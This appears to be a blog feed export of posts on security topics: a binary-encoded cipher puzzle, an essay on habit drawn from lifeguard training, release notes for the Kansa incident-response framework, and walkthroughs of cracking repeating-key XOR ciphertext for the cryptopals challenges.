davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-86393370430159110132019-04-28T20:34:00.002-07:002019-04-28T20:34:35.287-07:00Ode to Kasiski<span style="font-family: inherit;"><span style="font-size: small;">00101110 00000000 00000110 00001101 00000011 00011000 00001101 01010100 00001000 00001101 00010010<br />00000001 00011000 00000111 00000001 00010110 01001101 00001110 00010010 01001001 00010111 00011011<br />00001000 01000001 00010111 00000001 00010101 00000101 00000100 00000110 01001001 00010111 00010110<br />00010101 00010101 01010100 00000001 00001011 01001101 00010101 00011100 00000000 00010000 01010011<br />00011101 00001110 00000111 00011100 01000101 00001110 00000000 00011010 01001001 00001111 00010110<br />00001100 00000101 01010100 00000111 00001011 00001000 01000001 00000000 00000110 01000011 00010101<br />00000100 00010011 00000111 00011100 01000101 00001001 00000100 00000000 00001100 00010001 00011110<br />00000100 00001111 00010001 01001000 00010001 00000101 00000100 01010100 00000101 00000110 00011101<br />00001010 00010101 00011100 01001000 00001010 00001011 01000001 00000000 00000001 00000110 01010011<br />00000110 00000100 00001101 01001000 00010001 00000101 00000000 00000000 01001001 00010100 00010010<br />00011110 01000001 00000001 00011011 00000000 00001001 01000001 00000000 00000110 01000011 01010001<br />00001000 00001111 00010111 00011010 00011100 00011101 00010101 01010110 01001001 00001010 00000111<br />01000011 01000001 00111011 00000110 00000110 00001000 01000001 00000000 00000001 00000110 01010011<br />00000110 00000100 00001101 01001000 00001001 00001000 00001111 00010011 00011101 00001011 01010011<br />00000100 00010010 01010100 00000011 00001011 00000010 00010110 00011010 01000101 01000011 00011010<br />00011001 01000001 00011101 00011011 01000101 00011111 00000100 00011000 00001000 00010111 00011010<br />00011011 00000100 00011000 00010001 01000101 00011110 00001000 00011001 00011001 00001111 00010110<br />01001101 00010101 00011011 01001000 00000111 00011111 00010100 00000000 00001100 00000101 00011100<br />00011111 00000010 00010001 01001000 00010001 00000101 00000100 01010100 00000010 00000110 00001010<br />01001101 00001000 00000000 00011011 00000000 00000001 00000111 01010100 00001000 00001101 00010111<br />01001101 00000101 00010001 00011010 00001100 00011011 00000100 01010100 00011101 00001011 00010110<br />01001101 00001110 00000110 00000001 00000010 00000100 00001111 00010101 00000101 01000011 00010000<br />00000001 00000100 00010101 00011010 01000101 00011001 00000100 00001100 00011101 01000011 00010101<br />00011111 00001110 00011001 01001000 00010001 00000101 00000100 01010100 00001010 00001010 00000011<br />00000101 00000100 00000110 01001000 00010001 00001000 00011001 00000000 01000111</span></span>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-42036686998339960442019-04-19T05:46:00.002-07:002020-08-04T20:57:59.094-07:00We've always done it this wayI was recently reminded of Rear Admiral Grace Hopper remark:<br />
<blockquote class="tr_bq">
<span style="font-size: large;">The most damaging phrase in the language is “We’ve always done it this way!”</span></blockquote>
When I was in high school I was a lifeguard at a waterpark with a wave pool, water slides, a cave with a waterfall, a pair of monorails side-by-side and a toddler pool. There were plenty of hazards. It was a big bustling park.<br />
<br />
While working there I had dozens of "saves." Usually at the wave pool, where someone would get in too deep without good swimming skills. The waves would turn on and poor swimmers would find themselves in real trouble. Saving someone in the wave pool meant hitting the big red button on the guard stand to stop the wave machine, jumping in the water and navigating the crowd to get to the victim with rescue buoy in tow -- when working the wave pool, wearing the buoy was required. Depending on the victim's condition, a cross-chest carry to shallow water was sometimes necessary, but more commonly extending the rescue buoy was sufficient to help them recover.<br />
<br />
When I went away to college I applied for a lifeguard position at the university pool. At that point I had years of experience. I'd been a good competitive swimmer in high school and thought I had a good chance at getting the job.<br />
<br />
There was a rescue test before the interview. We went two at a time. I was in the first group. The pool was split into two lanes. Candidates stood at one end and current lifeguards were waiting in the water at the other. On the instruction of the pool manager we were to save the victims at the other end.<br />
<br />
I reacted to the situation with what I knew. I quickly put on the rescue buoy tether, dove in the water and swam with my head up, eyes on the victim, to the other end of the pool where I extended the buoy. The victim grabbed it, I towed him to the side of the pool, helped him from the water and made sure he was ok. I was so focused on my rescue that I didn't see how the other person's rescue went. I felt confident about my effort. I'd arrived at my victim quickly, and had performed a saving motion that I'd performed many times before.<br />
<br />
I took a seat in the bleachers to watch the next pair perform the exercise. When the lifeguards started flailing again, one of the candidates dove in and started swimming to the other end of the pool, but the other candidate didn't. Instead, she ran to the rescue hook hanging on the wall off to one side of the pool, grabbed the pole and hook, then ran to her victim and extended the pole. Her victim grabbed the hook and she pulled him to the side of the pool and helped him out.<br />
<br />
When we were finished with the exercise, the pool manager came over and said,<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: large;">"Everyone who got in the water to save their victim can go home, you're not going on to the next round."</span></blockquote>
<br />
Some of us were shocked. We had demonstrated that we could quickly react, that we could swim the length of the pool, that we knew how to use the rescue buoys, etc. Before anyone could ask why we were being sent home, the manager added,<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: large;">"When you got in the water to save your victims, you took unnecessary risks and increased the likelihood that two people would drown. Never get in the water to do what can be done safely from outside the water."</span></blockquote>
<br />
He wasn't wrong. It's one of the first lessons learned in lifeguard training, but my experience working in the waterpark conditioned me to operate differently.<br />
<br />
<br />
The memory of that experience recently returned to me. I was working a problem purely for the sake of working it when I realized my approach was wrong and the only reason I was working it that way was because I'd done it that way many times before, but always in the heat of an incident, working under pressure.<br />
<br />
Postmortems are a standard part of the post-incident process. We often review what went wrong and how it may be prevented in the future, but we don't always ask questions about the investigative and recovery processes and how they could be optimized.<br />
<br />
I recently started reading Daniel Kahneman's book, <u>Thinking Fast and Slow</u>. It's a fascinating read. Kahneman proposes that we are of two minds, <i>System 1 and System 2</i> as he calls them. System 1 is sort of our default mode of thinking, it's the type of thinking we use when we react to something -- a loud noise, interpreting the look on someone's face. System 2 is the type of thinking we use to solve problems that require focus and concentration -- 17 x 24 for example.<br />
<br />
<b>With enough practice and familiarity System 2 thinking can become System 1 thinking</b>. A chess grand master can look at positions on a board and recognize what the next best move is simply based on years of experience and pattern recognition whereas a novice player would have to engage System 2 and carefully weigh the options.<br />
<br />
My experience at the wave pool conditioned me to respond a certain way. There was no rescue hook that could reach the middle of the wave pool. Saving struggling swimmers required getting wet, but the pool manager at university was absolutely right that for the circumstances in his pool getting wet was the wrong approach except under specific circumstances (i.e. a body on the bottom of the pool).<br />
<br />
When you're working through a task or have completed it, it may be worth taking time to exam your approach. Is it the optimum method or are you doing things in the way you've always done them?davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-61448218788110350892015-08-14T10:56:00.000-07:002015-08-14T11:23:06.107-07:00Kansa's Stafford release: More capable, more forensically sound, more flexibleOver the last few months significant changes have been pushed to Kansa's <em>next</em> branch. Those changes were very recently pushed to master, then packaged into the <a href="https://github.com/davehull/Kansa/releases/tag/v0.8438-beta" target="_blank">Stafford release.</a> I mentioned in the release notes I would have a longer post here about the changes. There have been more than 130 commits since the previous release, I won't cover all of them, but let's hit the major changes.<br />
<br />
Kansa.ps1 has a handful of new parameters and command line switches:<br />
<strong></strong><br />
<strong>-OutputFormat</strong><br />
This is an optional parameter that takes an argument specifying the format for Kansa's output. Those familiar with Kansa know that individual collectors used to specify their own output format. Some collectors would return CSV, some would return CLIXML, some would return binary data. Now all collectors return data in a common format with CSV being the default. Valid arguments to -OutputFormat are CSV, <em>JSON</em>, TSV and XML. With the exception of JSON, all of these were previously supported. Support for binary and zip formats has been removed.<br />
<br />
You may be wondering how Kansa returns binary data since it can be used to collect arbitrary files and memory dumps. In previous releases, those data types were returned as binary files. With the Stafford release, those data elements are serialized and stored as object properties, those objects are then returned and stored as CSV or whatever output you specify. So a binary file is now a serialized property on an object. The serialization is base64 encoded, gzipped bytes of the original binary file.<br />
<br />
Obviously you need a way to deserialize this data in order to analyze it. There's a new analysis script for this in Analysis\Deserialize-KansaField.ps1. More details on this in a later post.<br />
<div style="text-align: left;">
</div>
<br />
<strong>-JSONDepth:</strong><br />
Another optional parameter that takes an int32 argument. Because we've added support for JSON, we had to add a parameter for specifying the depth of JSON's serialization. The default for Kansa is 10, which is sufficient for many things, but if you need to go deeper, you can.<br />
<br />
<strong>-UseSSL:</strong><br />
If this optional switch is present, Kansa.ps1 will call New-PSSession with the -UseSSL switch and remote sessions will use Secure Sockets Layer, <strong>iff</strong> you've done the legwork to push certificates. More on this in a later post.<br />
<br />
<strong>-Authentication:</strong><br />
Previous releases of Kansa only supported Kerberos (non-delegated, network) authentication, which is the safest authentication mechanism, if you're concerned about credential theft when running investigations across large numbers of hosts, which is something you should be concerned about. The trouble with only supporting Kerberos authentication is that it meant Kansa could not work in many scenarios, like authenticating against a local administrator account in cases where you either don't want to use a forest admin credential or you're investigating a machine that is not domain joined.<br />
<br />
-Authentication is an optional parameter, acceptable arguments are "Basic", "CredSSP", "Default", "Digest", "Kerberos", "Negotiate" and "NegotiateWithImplicitCredential". Remember, some of these will put your credentials at risk for harvesting by attackers. The default is still Kerberos.<br />
<br />
<strong>-Port:</strong><br />
And finally, for those running with PowerShell endpoints on alternate ports, you can use this optional parameter with an argument to specify the remote management port to use on the remote host(s).<br />
<br />
The first change above related to Kansa's output, makes the framework more forensically sound because we've eliminated a few cases where Kansa would previously write data to disk on remote hosts, potentially overwriting deleted data on those systems.<br />
<br />
The second set of changes, relating to authentication and transport make the framework more capable for non-domain scenarios. One thing I can now do with the framework that I couldn't do before is run it against Azure VMs to collect data from the cloud... fluffy, fluffy clouds.<br />
<br />
There are lots of other changes in Stafford as well and not all of them were committed by me. <a href="https://twitter.com/z4ns4tsu" target="_blank">@z4ns4tsu</a> made significant contributions to this release, including Modules\Disk\Get-MasterFileTable.ps1, a tool for parsing the MFT from target systems. Because it uses Win32 device namespace to access the file system in the raw, it bypasses file locks, attributes and access control lists.<br />
<br />
<a href="https://twitter.com/JValdezjr1" target="_blank">@JValdezjr1</a> also contributed changes, including some code in kansa.ps1 that will save target lists to a file when Kansa builds the target list dynamically by querying AD for the list of hosts in the domain.<br />
<br />
Kansa is maturing and this release is the most capable version yet. Please give it a try and if you run into problems, I'm the primary developer, so I'm sure there are bugs, open an issue at <a href="https://github.com/davehull/Kansa/issues">https://github.com/davehull/Kansa/issues</a> and let me know what problems you're encountering.<br />
<br />
I'll be following up in a few days with a post that demonstrates some of the new features in this release.<br />
<br />
Happy hunting!davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-80474319598520358462015-07-11T00:33:00.000-07:002015-07-11T14:12:10.252-07:00Cracking repeating XOR key cryptoMy last post here, <a href="http://trustedsignal.blogspot.com/2015/06/xord-play-normalized-hamming-distance.html">XOR'd play: Normalized Hamming Distance,</a> was a lengthy bit about the reliability of Normalized Hamming Distance to determine the size of a repeating XOR key that was used to encrypt a string of text and was based on my experience working on the Matasano Crypto Challenges at <a href="http://cryptopals.com/">cryptopals.com</a>. <br />
<br />
After a few weeks of focusing on other things, I returned to that effort and finished problem six from challenge set one, which says to use Normalized Hamming Distance to determine the probable key size and then use English letter frequency analysis to determine the probable bytes that make up the key. That's the short version.<br />
<br />
The script I wrote for challenge applies some extra math to the problem of determining key size, because I found normalized Hamming Distance alone to not be very reliable. However, even with the extra math, the problem is still one of probability, not certainty. If you have no idea about the key size, the problem is even more expansive, though not completely open ended because if it's repeating key, it has to be no more than half the size of the encrypted byte stream.<br />
<br />
Let's look at an example. Below I have already populated two variables, $plaintext and $key and am using <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Encrypt.ps1">XOR-Encrypt.ps1</a> to encrypt the $plaintext value with the $key and return a base64 encoded string. In the second command, I'm populating the $ciphertext variable with that base64 encoded string.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFy6rzpfg-3bG7Kt_oq7NYyqfiZIpr0fs4g6KmFAZF2CFFgLzcXHEsL8UiJJ3HT-HrXWADsOxGt6dxGmx7Ylu9GzPmTzKIFb37mlJo1pbf9NrB51SICA0Vxubph5-EkVQ2_Tutz-uyjJc/s1600/XOR-Encrypt.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFy6rzpfg-3bG7Kt_oq7NYyqfiZIpr0fs4g6KmFAZF2CFFgLzcXHEsL8UiJJ3HT-HrXWADsOxGt6dxGmx7Ylu9GzPmTzKIFb37mlJo1pbf9NrB51SICA0Vxubph5-EkVQ2_Tutz-uyjJc/s640/XOR-Encrypt.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
Now that we have a string of plaintext encrypted with a repeating XOR key, let's try cracking it.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz5GkJZCRGgLYjgYcXW_eMO7g84Kg0MG9Qu5FenBrygUPMDqT3byiDQgMsF2A4SSYqiMd-0BSkf5GXmpTieufEtKq7W6zdV8vsyqF2yvIT5NbNMIAaGc-pz7i6IRPRb8FcliXvMqNZmr0/s1600/Crack1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz5GkJZCRGgLYjgYcXW_eMO7g84Kg0MG9Qu5FenBrygUPMDqT3byiDQgMsF2A4SSYqiMd-0BSkf5GXmpTieufEtKq7W6zdV8vsyqF2yvIT5NbNMIAaGc-pz7i6IRPRb8FcliXvMqNZmr0/s640/Crack1.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
In the screenshot above, I've run the <a href="https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1">Crack-XORRepeatingKeyCrypto.ps1</a> script with about the minimum set of command line parameters. The VERBOSE output line tells me that I didn't provide a MaxKeySize value, so the script has calculated the number of bytes in the ciphertext and has set the MaxKeySize to half of that value. If we're dealing with repeating key XOR crypto, the key must be at most half the size of the ciphertext, otherwise the key can't repeat (completely).<br />
<br />
The script applies normalized Hamming Distance to find the top n most likely key sizes, five is the default, which you can see listed towards the bottom of the screen. Next, the script calculates the <em>most frequently occurring greatest common denominator</em>, hereafter MFOGCD, of those top n probable key sizes. In my testing, calculating the MFOGCD of the top n normalized average Hamming Distance values can be used to more accurately find the correct key size. This is a good example, as you can see, the correct key size is 30, but its normalized average Hamming Distance is fourth in the list of the top five.<br />
<br />
My script has a programmatic bias towards smaller key sizes, especially where they are the MFOGCD. This formula returns the correct key size more than 90% of the time in my testing where I was able to control for the MaxKeySize, whereas normalized average Hamming Distance alone only returns the correct key size about 40% of the time where MaxKeySize is controlled. If MaxKeySize is unknown, your mileage may vary.<br />
<br />
After the script determines the most probable key size, it transposes the ciphertext into blocks aligned on the key size byte boundaries. In other words, if the script determines the key size is 30 bytes, the first block will be comprised of ciphertext bytes 0, 29, 59, 89, 119, etc. The next block begins with ciphertext byte 1, then 30, 60, 90, 120, etc. This process repeats until all ciphertext bytes have been allocated to their respective blocks.<br />
<br />
Next the script moves into the actual brute-force phase, XORing each byte of the transposed blocks against ASCII printable characters. That's the default, you can apply all bytes 0x00 - 0xFF, via the -includeNonPrintable command line switch. If you think this takes longer, you're right.<br />
<br />
After each transposed block is XOR'd with each byte, the English letter frequency calculation is applied and the byte that results in the highest score, is deemed to be the most probable byte for that position in the key and the process repeats for each byte in the key.<br />
<br />
Once all the likely key bytes have been determined, the original ciphertext is XOR'd against that key and the likely plaintext is returned. You can see this above in the ProbableDecryptedValue property of the output. At first glance, the output looks pretty good, but if you read it carefully, you'll see it's not exactly correct. Remember we're dealing with probabilities.<br />
<br />
If you look at that ProbableKey property, you can see the probable key and you may be able to guess which byte is incorrect. You could use the <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a> script, which can take a user supplied key string and decrypt the ciphertext if you want to be more exact. Without a key, <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a>, assumes a single byte key and attempts to brute force it, but I digress.<br />
<br />
So that's the script when it's working well, but the probabilities sometimes don't come out so nicely. Here's another example:<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVBFOKEHOdSJ5SYhQbmueesiGsTwBC3WntVm_vqHtSNUe_yDni9jRubCvORF5finggVOiAr6qz16cEGCcMdK8ktmu13DA3ChGHznLQQV67zw-Ef4dqp12djhHfGzZw7GvGX_47kzmbtcI/s1600/Crack2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVBFOKEHOdSJ5SYhQbmueesiGsTwBC3WntVm_vqHtSNUe_yDni9jRubCvORF5finggVOiAr6qz16cEGCcMdK8ktmu13DA3ChGHznLQQV67zw-Ef4dqp12djhHfGzZw7GvGX_47kzmbtcI/s640/Crack2.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
If you look at the ProbableDecryptedValue property here, you can plainly see this does not look like English plaintext. What happened? The script worked as written. It calculated the MFOGCD among the top five most probable key sizes, but that value, 16, was not also listed in the top five most probable key sizes, so it didn't try 16 as a key size. Instead, it selected the smallest key among the keys with the smallest normalized average Hamming Distance, 416 and that turned out to be horribly wrong, but all is not lost.<br />
<br />
One approach that I've tried at this point, is to run the script again, but add the -MaxKeySize parameter with an argument matching the smallest key size from the above run, 48. Here's the output of that run:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjJfHPLULrkhW-Rdm4bnrJ2Bstn-x6fGlP8vp9KkK9-ObCXdBOvYdZbs_aInsDjElqYEiDzPm2ui4cG6gOCSoK183DnbZZD9DQLPRuV18QCdnHv7PJrt3NYkGt46FQJWY9dGNwaIaCeDI/s1600/Crack3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjJfHPLULrkhW-Rdm4bnrJ2Bstn-x6fGlP8vp9KkK9-ObCXdBOvYdZbs_aInsDjElqYEiDzPm2ui4cG6gOCSoK183DnbZZD9DQLPRuV18QCdnHv7PJrt3NYkGt46FQJWY9dGNwaIaCeDI/s640/Crack3.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
<br />
This looks more like English plaintext, but it's still not perfect. Note the ProbableKeySize property is 16 bytes, that was the MFOGCD from the previous run so I'm not surprised to see it is the probable key size. 48 still has the lowest normalized average Hamming Distance, but remember, the script has a bias towards smaller keys, especially when those keys are also the MFOGCD in the list of the top n ProbableKeySizes.<br />
<br />
Our key is obviously not 100% correct, but again there may be enough of the correct value there that you can make some guesses and use the <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a> script to try them out until you have the correct key.<br />
<br />
What happens if you run the script again and pass -MaxKeySize as 16, unfortunately, if you do that, the most probable key size becomes two because that is the MFOGCD and that yields even more inaccurate results.<br />
<br />
What's the practical use for this script? There is some malware that uses repeating XOR key encryption because it's easy to implement. You may be able to apply it in your analysis. Does it work against code?<br />
<br />
Here's an example:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb4-Z883aBXFGyu1wellNy1kUHQ-R_kV6ktTQQrxRnykU4Gu8HWKTC7JI8ZN_8c_qZ6og63tu2VXxpjkz14jUN3STs6JjOM8JcvFfbb65XUYBWn2btXF1kNJzqzoLXe9SyskYcDnGonkg/s1600/Crack4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="570" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb4-Z883aBXFGyu1wellNy1kUHQ-R_kV6ktTQQrxRnykU4Gu8HWKTC7JI8ZN_8c_qZ6og63tu2VXxpjkz14jUN3STs6JjOM8JcvFfbb65XUYBWn2btXF1kNJzqzoLXe9SyskYcDnGonkg/s640/Crack4.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
<br />
<a href="https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1">Crack-XORRepeatingKeyCrypto.ps1</a>'s accuracy could be improved at a performance cost. If you look at <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a>, you'll see that it has multiple scoring functions, a sort of mini-neural network. One for English letter frequency, one for English bigram frequency and one for English trigram frequency. All of the values returned from those functions factor into determining the most probable key for <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a>, but because of the way <a href="https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1">Crack-XORRepeatingKeyCrypto.ps1</a> works, determining the most probable byte for each position of the key against the transposed blocks, bigrams and trigrams can't be used because we're not looking at the bytes in context, so bigrams and trigrams won't follow their natural frequency of occurrence.<br />
<br />
<a href="https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1">Crack-XORRepeatingKeyCrypto.ps1</a> could factor in bigram and trigram scores when it moves to the stage of decrypting the original ciphertext, using what it has calculated as the most probable key, but that would require maintaining a list of the top n most probable keys and trying each of them, scoring them and choosing the one with the best score.<br />
<br />
Maybe if time permits, I'll trying making this change, but I'm afraid of what it may do to the run time.<br />
<br />
Lastly, the script includes a .SYNOPSIS section with help and examples, like any PowerShell script should. So do a <span style="font-family: "Courier New", Courier, monospace;">Get-Help -Full .\Crack-XORRepeatingKeyCrypto.ps1 | more</span> for additional information.davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com5tag:blogger.com,1999:blog-3580686762080119284.post-68044151674931918272015-06-07T13:42:00.001-07:002015-06-12T08:57:32.568-07:00XOR'd play: Normalized Hamming Distance<span style="font-family: Arial, Helvetica, sans-serif;">I've been playing around with the matasano crypto challenges for my own edification. Let me say up front, I'm a noob when it comes to crypto. I've used gpg, pgp, OpenSSL, etc. as a consumer of crypto products for a long time, but I've never really peeled back the onion and honestly, I'm not deep enough into Matasano's challenges to really have increased my understanding of modern crypto much at all. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">My point is, I'm learning and I may say some things here out of ignorance. Take that as a disclaimer.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Also, this post is going to be ridiculously long. TLDR; In my testing, normalized Hamming Distance alone accurately returned the correct repeating XOR key size in about 40% of cases, but there's a simple calculation you can add that can increase this to over 90%.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In the challenges, Matasano introduces Hamming Distance, something I'd read about previously, but only in passing. Hamming Distance is the measure of difference between two strings. For example, the Hamming Distance between "fuse" and "fuel" is two because two characters would have to be changed to make the two strings the same.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">For the crypto challenges, Hamming Distance is calculated at the bit level rather than at the character level as above, so to get the Hamming Distance bit-by-bit, we convert the strings to a byte arrays, then convert each byte to bits, then count the number of differences:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">PS> GetByteArray "fuse" | ForEach-Object { GetBits $_ }<br />01100110<br />01110101<br />01110011<br />01100101<br />PS> GetByteArray "fuel" | ForEach-Object { GetBits $_ }<br />01100110<br />01110101<br />01100101<br />01101100</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Obviously there's no difference in the bits for the first two bytes. Let's stack the bit strings for the last two bytes one after the other, it'll make counting the differences easier. I've highlighted the columns with differences:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">011<span style="background-color: yellow; color: black;">1</span>0<span style="background-color: yellow;">0</span><span style="background-color: yellow;">1</span>1 s 0110<span style="background-color: yellow;">0</span>10<span style="background-color: yellow;">1</span> e</span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="color: black;">011<span style="background-color: yellow;">0</span>0<span style="background-color: yellow;">1</span><span style="background-color: yellow;">0</span>1</span> e 0110<span style="background-color: yellow;">1</span>10<span style="background-color: yellow;">0</span> l</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In total then, there are five different bits between the two strings. The Hamming Distance then is five. Perceptive readers may notice that if the bytes above are XOR'd against one another, the result is that five bits are set to 1:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"> 01110011 s 01100101 e</span><br />
<span style="font-family: "Courier New", Courier, monospace;">XOR 01100101 e XOR 01101100 l</span><br />
<span style="font-family: "Courier New", Courier, monospace;">-------------- --------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 00010110 00001001</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">So we can use XOR for each pair of bytes, count the 1 bits and the result is the Hamming Distance. Incidentally, Hamming Distance, when calculated at the bit level as above, is equivalent to calculating the Index of Coincidence, which is useful to cryptographers attempting to crack polyalphabetic substitution ciphers such as Vigenère cipher or repeating XOR key encryption, which is what the initial set of challenges are built around.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Repeating XOR key encryption is a simple encryption scheme and not one that is terribly secure. Here's an example of how it works. Let's take our "fuse fuel" and XOR it with the key "few."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Converting our strings to bytes:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">102:117:115:101:032:102:117:101:108 f:u:s:e: :f:u:e:l</span><br />
<span style="font-family: "Courier New", Courier, monospace;">102:101:119 f:e:w</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In repeating XOR, since our key is shorter than our plaintext, we repeat the key, so the bytes line up as follows:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">102:117:115:101:032:102:117:101:108 f:u:s:e: :f:u:e:l</span><br />
<span style="font-family: "Courier New", Courier, monospace;">102:101:119:102:101:119:102:101:119 f:e:w:f:e:w:f:e:w</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Now we XOR the values together and the result in bytes is:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">000:016:004:003:069:017:019:000:027</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Notice wherever the same bytes lined up with each other above, they cancel each other out, this is also true for the bits, to see this in action, consider the second byte pair:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">117 in bits 01110101 01110101</span><br />
<span style="font-family: "Courier New", Courier, monospace;">101 in bits 01100101 XOR'd: 01100101</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> --------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 00010000 in decimal 016 as above.</span><br />
<span style="font-family: "Courier New", Courier, monospace;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The challenge says that Normalized Hamming Distance can be used to calculate probable XOR key size. An algorithm is given, but there's a little ambiguity in the directions, so you still have to figure out the details. Essentially, you take the first n bytes of the ciphertext and calculate the Hamming Distance of those bytes against the next n bytes and divide the result by the key size. Whichever size yields the smallest Normalized Hamming Distance is probably the key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Let's walk through this, but for the sake of demonstration, we'll modify our plaintext to the following:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">"fuse fuel for falling flocks"</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Yes, it's a silly string, but I think it will make explaining things easier due to it's length. XOR encrypted with our key, we get the following byte array:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">000:016:004:003:069:017:019:000:027:070:003:024:020:069:017:007:009:027:015:011:016:070:003:027:009:006:028:021</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
